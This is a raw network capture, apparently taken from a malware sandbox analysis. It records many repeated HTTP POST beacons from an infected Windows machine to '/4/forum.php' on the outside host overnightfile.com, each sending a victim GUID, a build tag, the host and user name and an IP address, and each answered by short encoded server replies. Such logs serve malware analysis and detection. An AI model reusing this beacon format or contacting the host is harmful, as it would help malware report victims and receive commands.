                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:50.366945982 CEST869INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKYBPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:50.808279037 CEST870OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:50.903605938 CEST870INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:50 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZQJAARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:51.489044905 CEST870OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:51.583834887 CEST871INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQTGJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:52.254606962 CEST871OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:52.344182014 CEST871INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBJQYARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:53.264769077 CEST872OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:53.357738972 CEST872INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 59 42 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTYBGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:53.678448915 CEST873OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:53.770147085 CEST873INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:53 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKYBPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:54.752809048 CEST873OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:54.842693090 CEST874INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 51 4a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKQJPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:55.162519932 CEST874OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:55.256217003 CEST874INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYZABARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:55.581312895 CEST875OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:55.676470041 CEST875INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 46 55 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cAFUZARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:55.985083103 CEST876OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:56.082051992 CEST876INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFKPUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:56.372133017 CEST876OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:56.467552900 CEST877INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 47 54 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVGTEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:57.074621916 CEST877OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:57.168193102 CEST877INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMCXNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:57.509881020 CEST878OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:57.606030941 CEST878INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 4a 51 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTJQGARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:57.901901960 CEST878OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:57.990927935 CEST879INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 51 4a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQQJJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:58.300019026 CEST879OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:58.390605927 CEST879INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMKPNARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:58.708343983 CEST880OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:58.807141066 CEST880INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:58 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 41 5a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGAZTARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:59.119708061 CEST881OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:59.218976021 CEST881INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:58 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQBYJARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:59.530056000 CEST881OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:59.628071070 CEST882INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:59 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
